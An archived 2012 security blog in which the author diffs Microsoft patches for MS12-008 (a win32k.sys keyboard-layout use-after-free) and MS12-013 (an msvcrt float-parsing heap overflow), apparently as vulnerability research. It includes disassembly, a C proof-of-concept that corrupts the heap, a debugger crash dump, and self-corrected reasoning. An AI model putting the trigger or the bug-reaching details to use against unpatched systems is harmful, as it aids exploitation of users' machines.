Monthly Archives: February 2012

MS12-008 : win32k.sys Keyboard Layout Use After Free vulnerability

MS12-008 : win32k.sys Keyboard Layout Use After Free vulnerability

Related CVE : CVE-2012-0154
Before Patch Binary : win32k.sys 6.1.7600.16920 (win7_gdr.111123-1510)
After Patch Binary : win32k.sys 6.1.7600.16948 (win7_gdr.120113-1505)

If you remember MS10-073 (stuxnet), then MS12-008 may sound familiar. Refer these articles. The analysis by Vupen, and a public exploit.

Once I diffed win32k.sys with DarunGrim, I simply searched for the patched functions which include the word “keyboard”. This led me to the function, xxxLoadKeyboardLayoutEx(), and the differences on the basic block looks interesting. For your better understanding, don’t forget this: we are going after use-after-free bug.

.text:BF815284 push eax ; Tag
.text:BF815285 push dword ptr [ebx+0Ch] ; P
.text:BF815288 call ds:__imp__ExFreePoolWithTag@8 ; ExFreePoolWithTag(x,x)
.text:BF81528E push ebx
.text:BF81528F call _HMMarkObjectDestroy@4 ; HMMarkObjectDestroy(x)
.text:BF815294 push ebx
.text:BF815295 call _HMUnlockObject@4 ; HMUnlockObject(x)

This is before the patch.

.text:BF815293 push edi ; Address
.text:BF815294 call _DestroyKF@4 ; DestroyKF(x)

This is after the patch. As you can see, the destructor routines has been wrapped up into DestroyKF() in the patch. Let’s see the inside of DestroyKF() function then.

.text:BF8E3F59 ; int __stdcall DestroyKF(PVOID Address)
.text:BF8E3F59 _DestroyKF@4 proc near ; CODE XREF: xxxLoadKeyboardLayoutEx(x,x,x,x,x,x,x,x,x)+1D6p
.text:BF8E3F59 ; DestroyKL(x)+37p ...
.text:BF8E3F59
.text:BF8E3F59 Address = dword ptr 8
.text:BF8E3F59
.text:BF8E3F59 mov edi, edi
.text:BF8E3F5B push ebp
.text:BF8E3F5C mov ebp, esp
.text:BF8E3F5E push esi
.text:BF8E3F5F mov esi, [ebp+Address]
.text:BF8E3F62 push esi
.text:BF8E3F63 call _HMMarkObjectDestroy@4 ; HMMarkObjectDestroy(x)
.text:BF8E3F68 test eax, eax
.text:BF8E3F6A jz short loc_BF8E3F83
.text:BF8E3F6C push esi
.text:BF8E3F6D call _RemoveKeyboardLayoutFile@4 ; RemoveKeyboardLayoutFile(x)
.text:BF8E3F72 push 0 ; Tag
.text:BF8E3F74 push dword ptr [esi+0Ch] ; P
.text:BF8E3F77 call ds:__imp__ExFreePoolWithTag@8 ; ExFreePoolWithTag(x,x)
.text:BF8E3F7D push esi ; Address
.text:BF8E3F7E call _HMFreeObject@4 ; HMFreeObject(x)
.text:BF8E3F83
.text:BF8E3F83 loc_BF8E3F83: ; CODE XREF: DestroyKF(x)+11j
.text:BF8E3F83 pop esi
.text:BF8E3F84 pop ebp
.text:BF8E3F85 retn 4
.text:BF8E3F85 _DestroyKF@4 endp

Oh yes. Though there’s some changes in the order to invoke the free/destructor functions, but the most interesting point should be _RemoveKeyboardLayoutFile@4(): _RemoveKeyboardLayoutFile@4() wasn’t invoked in the old version, but the new version invoked.

Let’s see what _RemoveKeyboardLayoutFile() does.

.text:BF8E3F8D ; __stdcall RemoveKeyboardLayoutFile(x)
.text:BF8E3F8D _RemoveKeyboardLayoutFile@4 proc near ; CODE XREF: DestroyKF(x)+14p
.text:BF8E3F8D
.text:BF8E3F8D arg_0 = dword ptr 8
.text:BF8E3F8D
.text:BF8E3F8D mov edi, edi
.text:BF8E3F8F push ebp
.text:BF8E3F90 mov ebp, esp
.text:BF8E3F92 mov ecx, [ebp+arg_0]
.text:BF8E3F95 mov eax, _gpKbdTbl
.text:BF8E3F9A cmp eax, [ecx+10h]
.text:BF8E3F9D jnz short loc_BF8E3FA9
.text:BF8E3F9F mov _gpKbdTbl, offset _KbdTablesFallback
.text:BF8E3FA9
.text:BF8E3FA9 loc_BF8E3FA9: ; CODE XREF: RemoveKeyboardLayoutFile(x)+10j
.text:BF8E3FA9 mov eax, _gpKbdNlsTbl
.text:BF8E3FAE cmp eax, [ecx+18h]
.text:BF8E3FB1 jnz short loc_BF8E3FBA
.text:BF8E3FB3 and _gpKbdNlsTbl, 0
.text:BF8E3FBA
.text:BF8E3FBA loc_BF8E3FBA: ; CODE XREF: RemoveKeyboardLayoutFile(x)+24j
.text:BF8E3FBA mov eax, _gpkfList
.text:BF8E3FBF cmp ecx, eax
.text:BF8E3FC1 jnz short loc_BF8E3FCD
.text:BF8E3FC3 mov eax, [ecx+8]
.text:BF8E3FC6 mov _gpkfList, eax
.text:BF8E3FCB jmp short loc_BF8E3FDC
.text:BF8E3FCD ; ---------------------------------------------------------------------------
.text:BF8E3FCD
.text:BF8E3FCD loc_BF8E3FCD: ; CODE XREF: RemoveKeyboardLayoutFile(x)+34j
.text:BF8E3FCD ; RemoveKeyboardLayoutFile(x)+47j
.text:BF8E3FCD mov edx, eax
.text:BF8E3FCF mov eax, [eax+8]
.text:BF8E3FD2 cmp ecx, eax
.text:BF8E3FD4 jnz short loc_BF8E3FCD
.text:BF8E3FD6 mov eax, [eax+8]
.text:BF8E3FD9 mov [edx+8], eax
.text:BF8E3FDC
.text:BF8E3FDC loc_BF8E3FDC: ; CODE XREF: RemoveKeyboardLayoutFile(x)+3Ej
.text:BF8E3FDC pop ebp
.text:BF8E3FDD retn 4
.text:BF8E3FDD _RemoveKeyboardLayoutFile@4 endp

Given the data structure as an argument, RemoveKeyboardLayoutFile() loops over the linked list in which the head pointer is stored the global variable _gpkfList. While traversing over the linked list, RemoveKeyboardLayoutFile() tries to find the identical entry with the argument, then remove it from the linked list. Ok, fair enough. This logic also conforms with the function name.

Then our question should be “which function initialize (or update) this linked list ? By searching for the cross reference on _gpkfList, you will find LoadKeyboardLayoutFile() is updating this data structure. With the given argument, it first checks whether the given one is already loaded. If it’s not, then insert into the linked list.

Alright. Now we can see why this is a use-after-free bug. When xxxLoadKeyboardLayoutEx() is trying to destroy the target data structure, it forgot to clean up the linked list. Thus, even after the actual buffer is freed, the linked list still says there’s a target data structure. So, if we try to access that data structure with the same information, it will use the buffer pointer, which would be already freed.

The last question is how to reach to the vulnerable point (destructor rouintes). Again, going back to the destructor routine, then you will find it is reachable when HMAllocObject() fails.

.text:BF815271 push 44h ; NumberOfBytes
.text:BF815273 push 0Dh ; char
.text:BF815275 push 0 ; int
.text:BF815277 push 0 ; int
.text:BF815279 call _HMAllocObject@16 ; HMAllocObject(x,x,x,x)
.text:BF81527E mov esi, eax
.text:BF815280 test esi, esi
.text:BF815282 jnz short loc_BF8152B4

How to make the allocation fail ? Refer Tarjei Mandt’s comment on twitter: “You can exhaust the user handle table or try to exceed the handle quota limit (win32k!gUserProcessHandleQuota)”. Note that he’s name is on MS12-008 vulnerability description 🙂

I’ve shortly tried this, but it doesn’t work @.@ Cause I don’t want to waste my time by doing a brute force like approaches, I simply bought a Windows Internals book ! 🙂

Update : Forgot to mention the upcoming patch on another keyboard layout vulnerability (still zero-day!!), which is disclosed by the 0day exploit in wild. The description on this bug is as follows.The keyboard layout file (just like .dll file) can be loaded into the kernel. Interestingly, a keyboard layout file contains the hard-coded address pointer 🙂 Later, the kernel accesses the user space address by creating the mapping, but the kernel does not validate the user address pointer located in the keyboard layout file.This eventually crashes the system. Yes, this is a place holder for MSxx-xxx.

Advertisements

MS12-013: Vulnerability in C Run-Time Library could allow remote code execution

MS12-013: Vulnerability in C Run-Time Library could allow remote code execution

Update (Feb 16): Confirmed PoC is working. You can download compiled .exe file, which is dynamically linked with msvcrt.dll. Tested on Windows 7 32bit and 64bit. Download ms12-013poc.exe. Again, thanks to anonymous comments.

Update (Feb 16): Shame on me. The last analysis was incorrect. Surprisingly PoC was quite correct to trigger the vulnerability. I would say still this analysis is also not confirmed. To trigger the vulnerability, the best way would be to compile PoC with Visual Studio 6 using /MD option. Once you’ve compiled in this way, your binary may trigger the vulnerability most of other machines including Windows 7 because Windows 7 also has vulnerable MSVCRT.dll in its system directory. Visual Studio 2003 or higher versions (as MS tech blog described) cannot dynamically link with old MSVCRT.dll (I’ve tried some tricks, but it doesn’t work). Those only link to MSVCRxx.dll, which is not vulnerable to MS12-013.

Update : This may not trigger the actual heap overflow, and I’m not sure whether this routine is the vulnerability patch for MS12-013. Please read the comments.

C Run-Time vulnerability ! Guess all you guys were excited to see the title, because the word, C Run-Time, sounds to make this vulnerability working for numerous of Windows products? To be honest, I don’t quite trust MS tech descriptions, but you better read their interpretations on this bug. They said the only attack vector would be through ‘Windows Media Player’. (Again, you don’t have to trust them …)

MS patched msvcrt.dll, definitely well known C Run-time library in Windows. With DarunGrim, you can see the function, __check_float_string() is patched (though you may not see the symbol there, but IDA FLIRT should be able to do that). Because C Run-time library is distributed with its source code in Visual Studio, you can also see the source codes here: VC/CRT/src/input.c::int __check_float_string(size_t,size_t *, _TCHAR**, _TCHAR*, int*).

The working logic of __check_float_string() function is as follows.C Run-Time library manages the static sized buffer (_TCHAR floatstring[_CVTBUFSIZE + 1];) from the start, and it re-allocates the buffer as the more buffer size is required. When it reallocates the buffer, it simply allocates the doubled size buffer, and doubles the size variable as well. At the first time of increasing, calloc() is used, and then recalloc() will be used. The cause of MS12-013 happens when it tries to store new size of buffer.

.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25j
.text:6FFBEA1E push 2
.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block
.text:6FFBEA21 call __calloc_crt

.text:6FFBEA26 pop ecx
.text:6FFBEA27 pop ecx
.text:6FFBEA28 mov [edi], eax
.text:6FFBEA2A test eax, eax
.text:6FFBEA2C jz short loc_6FFBEA1A
.text:6FFBEA2E push [ebp+pulResult] ; size_t
.text:6FFBEA31 mov eax, [ebp+arg_8]
.text:6FFBEA34 push [ebp+arg_4] ; void *
.text:6FFBEA37 mov dword ptr [eax], 1
.text:6FFBEA3D push dword ptr [edi] ; void *
.text:6FFBEA3F call _memcpy

.text:6FFBEA44 mov eax, [esi]
.text:6FFBEA46 push esi ; pulResult
.text:6FFBEA47 add eax, eax ; !!!!
.text:6FFBEA49 push 2 ; int
.text:6FFBEA4B push eax ; int
.text:6FFBEA4C mov [esi], eax
.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)

.text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
.text:6FFBEA58 jge short loc_6FFBEA78

This is the old version. Focus on the arguments of __calloc_crt() and SizeTMult(). When it invokes __calloc_crt(), the argument would be __calloc_crt( Size, 2). However, when SizeTMult() is invoked to record the size variable, the argument would be SizeTMult( Size*2, 2, &pResult). Thus, though the actual size of allocated buffer is Size*2, but the size variable stores Size*2*2. Because of this mis-computation, heap overflow would be triggered outside of this function. (Note: last analysis pointed out the cause is integer overflow, but it is not. Thanks to the comments from anonymous folk).

PoC seems to be still valid. __check_float_string() keeps the track of single floating point string, which is corresponding to the each format string delimiter (like %f). If you give a very long floating point string, like 1.0000…000, then it will reallocate the buffer, but the it will misinterpret the size of a reallocated buffer. Note that this PoC is never tested on the vulnerable environment. It would great to hear from you whether this is actually working.


// MS12-013 PoC
#include

#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")
#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")
#pragma comment(lib, "vs6/msvcrt.lib") // I've scratched this file from VC6
#define BUF_SIZE 0x300

void main( void )
{
char * pStr;
float f;
int i;

pStr = (char*)malloc(BUF_SIZE);
memset(pStr, 0, BUF_SIZE);
strcpy(pStr, "1.");
for( i=1; i<=BUF_SIZE-10; i++){
strcat(pStr, "0");
}

printf("Before scanf()\n");

sscanf(pStr,"%f", &f);

printf("After scanf()\n");

printf("%f\n", f); // place holder for the floating point library
}

Below shows the windbg debugging dump.

0:000:x86> g
HEAP[testme.exe]: Heap block at 00823738 modified at 008239FC past requested size of 2bc
(1f24.1674): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpBreakPointHeap+0x23:
77ca04e4 cc int 3
0:000:x86> g
HEAP[testme.exe]: Invalid address specified to RtlFreeHeap( 00820000, 00823740 )
(1f24.1674): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpBreakPointHeap+0x23:
77ca04e4 cc int 3
0:000:x86> g
(1f24.1674): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpFreeHeap+0x85a:
77c27074 8b19 mov ebx,dword ptr [ecx] ds:002b:30303030=????????
0:000:x86> r
eax=00823a18 ebx=00000046 ecx=30303030 edx=008207e0 esi=008207d8 edi=00820000
eip=77c27074 esp=0018fb30 ebp=0018fc10 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
ntdll32!RtlpFreeHeap+0x85a:
77c27074 8b19 mov ebx,dword ptr [ecx] ds:002b:30303030=????????

This is the patched version. Again, focus on the argument of SizeTMult(), SizeTMult( Size, 2, &pResult). MS removed “add eax, eax” instruction.

.text:6FFBF935 push [ebp+pulResult] ; size_t
.text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h

—————————–

.text:6FFBEA64 loc_6FFBEA64: ; CODE XREF: sub_6FFBE9F3+12j
.text:6FFBEA64 push 2 ; Size
.text:6FFBEA66 push ebx ; Count
.text:6FFBEA67 push eax ; Memory
.text:6FFBEA68 call __recalloc_crt
.text:6FFBEA6D add esp, 0Ch
.text:6FFBEA70 test eax, eax
.text:6FFBEA72 jz short loc_6FFBEA1A
.text:6FFBEA74 mov [edi], eax
.text:6FFBEA76 shl dword ptr [esi], 1
.text:6FFBEA78

This is the old version.

.text:6FFBF966 push 2 ; Size
.text:6FFBF968 push ebx ; Count
.text:6FFBF969 push eax ; Memory
.text:6FFBF96A call __recalloc_crt
.text:6FFBF96F add esp, 0Ch
.text:6FFBF972 test eax, eax
.text:6FFBF974 jz short loc_6FFBF921
.text:6FFBF976 push edi ; pulResult
.text:6FFBF977 mov [esi], eax
.text:6FFBF979 push 2 ; int
.text:6FFBF97B push dword ptr [edi] ; int
.text:6FFBF97D call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)
.text:6FFBF982 add esp, 0Ch
.text:6FFBF985 jmp short loc_6FFBF958

This is the patched version. Yes, it just seems obvious. After reallocating the buffer (double the size), and this size information will be stored again. The old version re-computed the doubled size using SHL instruction, but the new version did using SizeTMult(). If you are familiar with integer overflow bugs, using SizeTMult() instead of primitive multiplication instructions implicates the integer overflow patches. To be specific, SizeTMult() multiplies input values, and returns FALSE if there is overflow. This allows the caller of SizeTMult() to easily capture the integer overflow.

To understand the working logic around here, you can refer the source codes distributed with MS Visual Studio: VC/CRT/src/input.c::int __check_float_string(size_t,size_t *, _TCHAR**, _TCHAR*, int*) (See his tweet). C Run-Time library manages the static size buffer (_TCHAR floatstring[_CVTBUFSIZE + 1];) from the beginning, and it re-allocates the buffer as the more buffer size is required. (This is actually done by both calloc() and realloc(), but you can simply think of this as only realloc() is used).

When it requires more buffer, it simply allocates the doubled size of the previous size, and stores the doubled size. However, because the old version simply uses ‘SHL’, there could be integer overflow if it becomes bigger than 2G (i.e. 0x80000000).

This routine keeps the buffer for the single matched target of each format string element. Thus if you put very long string (like very long floating point string, 1.0000000000000000….0000), the size of internal buffer will be doubled all over again while reading this long element, and eventually this will lead to the integer overflow.


If you compile this with /MT option, msvcrt.lib will be statically linked. If you do this with /MD option, msvcrt.dll will be dynamically linked. MS Technet blog described some more details which version of run-time library is vulnerable, so you may need to check their descriptions.

Update (Feb 15)
recalloc(void *Memory, size_t Count, size_t Size) checks the integer overflow conditions (possibly triggered by Count*Size)., but this check is done only if Count < 0. This implicates _recalloc() cannot be used for integer overflows. lol

.text:6FF80457 ; void *__cdecl _recalloc(void *Memory, size_t Count, size_t Size)
.text:6FF80457 __recalloc proc near ; CODE XREF: __recalloc_crt+12p
.text:6FF80457 ; sub_6FF7CDEE+1CFBFp …
.text:6FF80457
.text:6FF80457 Memory = dword ptr 8
.text:6FF80457 Count = dword ptr 0Ch
.text:6FF80457 Size = dword ptr 10h
.text:6FF80457
.text:6FF80457 ; FUNCTION CHUNK AT .text:6FF9467C SIZE 0000001F BYTES
.text:6FF80457
.text:6FF80457 mov edi, edi
.text:6FF80459 push ebp
.text:6FF8045A mov ebp, esp
.text:6FF8045C mov ecx, [ebp+Count]
.text:6FF8045F push esi
.text:6FF80460 xor esi, esi
.text:6FF80462 cmp ecx, esi
.text:6FF80464 jbe short loc_6FF80476
.text:6FF80466 push 0FFFFFFE0h
.text:6FF80468 xor edx, edx
.text:6FF8046A pop eax
.text:6FF8046B div ecx
.text:6FF8046D cmp eax, [ebp+Size]
.text:6FF80470 jb loc_6FF9467C
.text:6FF80476
.text:6FF80476 loc_6FF80476: ; CODE XREF: __recalloc+Dj
.text:6FF80476 imul ecx, [ebp+Size]
.text:6FF8047A push ecx ; size_t
.text:6FF8047B push [ebp+Memory] ; void *
.text:6FF8047E call _realloc
.text:6FF80483 pop ecx
.text:6FF80484 pop ecx

Thus, when Count is still positive value, then there’s no internal overflow checks. To bypass this check routine, you’ve got to use functions with unicodes. This will set Size=4, then Count doesn’t have to be negative to cause the integer overflow.

text:6FF9C8A9 push 4 ; Size
.text:6FF9C8AB push ebx ; Count
.text:6FF9C8AC push eax ; Memory
.text:6FF9C8AD call __recalloc_crt